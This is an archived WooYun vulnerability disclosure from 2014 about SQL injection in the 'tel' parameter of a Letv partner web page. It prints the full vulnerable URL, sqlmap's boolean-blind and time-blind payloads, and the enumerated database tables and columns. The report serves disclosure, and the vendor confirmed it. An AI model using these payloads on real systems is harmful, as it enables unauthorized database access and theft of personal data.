乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-05-24: 细节已通知厂商并且等待厂商处理中 2014-05-24: 厂商已经确认,细节仅向厂商公开 2014-06-03: 细节向核心白帽子及相关领域专家公开 2014-06-13: 细节向普通白帽子公开 2014-06-23: 细节向实习白帽子公开 2014-07-08: 细节向公众公开
“sql注射”敏感信息
乐视合作
大鹏?屌丝男士?..
http://baolai.hz.letv.com/php/balaiadd.php?<code>callback=jQuery17106639694047626108_1400897743620&username=wooyun&tel=18688888888&sex=%E7%94%B7&prav=%E5%90%89%E6%9E%97&city=%E9%80%9A%E5%8C%96&addre=%E9%80%9A%E5%8C%96%E9%91%AB%E5%AE%87%E6%B1%BD%E8%BD%A6%E9%94%80%E5%94%AE%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8&_=1400897790469tel参数过滤不严存在注入
---Place: GETParameter: tel Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: callback=jQuery17106639694047626108_1400897743620&username=wooyun&tel=18688888888' RLIKE (SELECT (CASE WHEN (3539=3539) THEN 18688888888 ELSE 0x28END)) AND 'Zlvz'='Zlvz&sex=%E7%94%B7&prav=%E5%90%89%E6%9E%97&city=%E9%80%9A%E5%8C%96&addre=%E9%80%9A%E5%8C%96%E9%91%AB%E5%AE%87%E6%B1%BD%E8%BD%A6%E9%94%80%E5%94%AE%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8&_=1400897790469 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: callback=jQuery17106639694047626108_1400897743620&username=wooyun&tel=18688888888' AND SLEEP(5) AND 'eyzO'='eyzO&sex=%E7%94%B7&prav=%E5%90%89%E6%9E%97&city=%E9%80%9A%E5%8C%96&addre=%E9%80%9A%E5%8C%96%E9%91%AB%E5%AE%87%E6%B1%BD%E8%BD%A6%E9%94%80%E5%94%AE%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8&_=1400897790469---
available databases [2]:[*] baolai[*] information_schema
Database: baolai[3 tables]+--------+| baolai || juben || video |+--------+
Database: baolaiTable: baolai[8 columns]+----------+--------------+| Column | Type |+----------+--------------+| time | varchar(100) || addre | varchar(200) || city | varchar(100) || id | int(10) || prav | varchar(100) || sex | varchar(10) || tel | varchar(60) || username | varchar(60) |+----------+--------------+
Database: baolaiTable: juben[6 columns]+----------+----------------+| Column | Type |+----------+----------------+| time | varchar(100) || bianhao | varchar(10) || cont | varchar(10000) || num | int(10) || title | varchar(100) || username | varchar(100) |+----------+----------------+
Database: baolaiTable: video[2 columns]+--------+-------------+| Column | Type |+--------+-------------+| id | varchar(10) || num | int(10) |+--------+-------------+
过滤?
危害等级:高
漏洞Rank:12
确认时间:2014-05-24 11:53
谢谢对我们安全的关注,尽快修复~
暂无